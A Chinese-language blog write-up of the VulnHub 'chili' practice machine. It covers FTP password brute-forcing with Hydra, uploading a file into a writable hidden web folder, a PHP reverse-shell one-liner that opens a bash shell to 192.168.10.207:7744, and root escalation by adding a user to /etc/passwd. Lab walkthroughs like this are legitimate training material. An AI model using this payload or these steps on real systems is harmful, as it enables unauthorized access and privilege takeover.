vulnhub-chili


信息收集

扫描目标靶机端口,发现只开了80和21端口,21端口开的还是ftp服务。

前渗透阶段

访问80端口,除了一个辣椒页面啥也没有,

于是只能访问21端口看看ftp是不是可以匿名访问的,可惜不能,账号和密码,我们此时都不知道,我们在下载靶机的时候,作者给了我们一些提示,让我们试试靶场名字也就是chili,没有密码只能爆破,跑九头蛇,找到了密码,a1b2c3d4

ftp -nv 192.168.10.74    //linux ftp连接命令
put 12138.php /var/www/html/.nano/12138.php    //将你本机现在所在路径中的12138.PHP文件上传到目标机器/var/www/html/.nano路径下



登录上ftp之后随便翻翻也没有什么,想着从系统版本漏洞入手,uname-a一看比我的kali版本都新,告辞。再用sudo命令,发现被禁用了,再换个命令查看权限,发现也没有什么特殊的权限,心态炸裂,只能到处ls -la看看有没有什么隐藏的文件说不定我们就会有较高的权限,

果然,我们在/var/www/htnl中发现了隐藏文件,而且我们还有很高的权限,和root一样,那么就可以向里边上传PHP版本的反弹shell脚本,浏览器访问之后,就拿到了www-data用户的shell。

<?php 
system("bash -c 'bash -i>& /dev/tcp/192.168.10.207/7744 0>&1' ");
?>
//版本的PHP反弹shell


后渗透阶段

之前我们在.nano文件中具有和root一样的权限,那么我们完全可以在此文件中利用我们的权限向/etc/passwd中写入一个root组的用户,然后转换用户就提权了,没想到吧,这个靶场提权就是这么简单。


文章作者: lemon-fan
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 lemon-fan !
 上一篇
普通的docker提权 普通的docker提权
简述一下docker和虚拟机的区别,docker利用的是你自己本身的PC的内核,而虚拟机则会完全虚拟出一个类真实环境,它会完全虚拟出一个PC该有内核,操作系统等,也就是说你的虚拟机如果没有第三方媒介的话,与你的PC可以说是两个独立的个体。而
2020-12-19
下一篇 
一些知识的积累 一些知识的积累
关于博客我今天被博客cdn加速给疯狂军训,到最后我才发现,是我的博客用的cdn自身有问题,先在这里介绍一下我用的cdn:jsdelivr,是一个对部署在github上的博客有加速功能的cdn,但是,这个cdn你如果让他加速图片的话,例如:你
2020-11-27 lemon-fan
  目录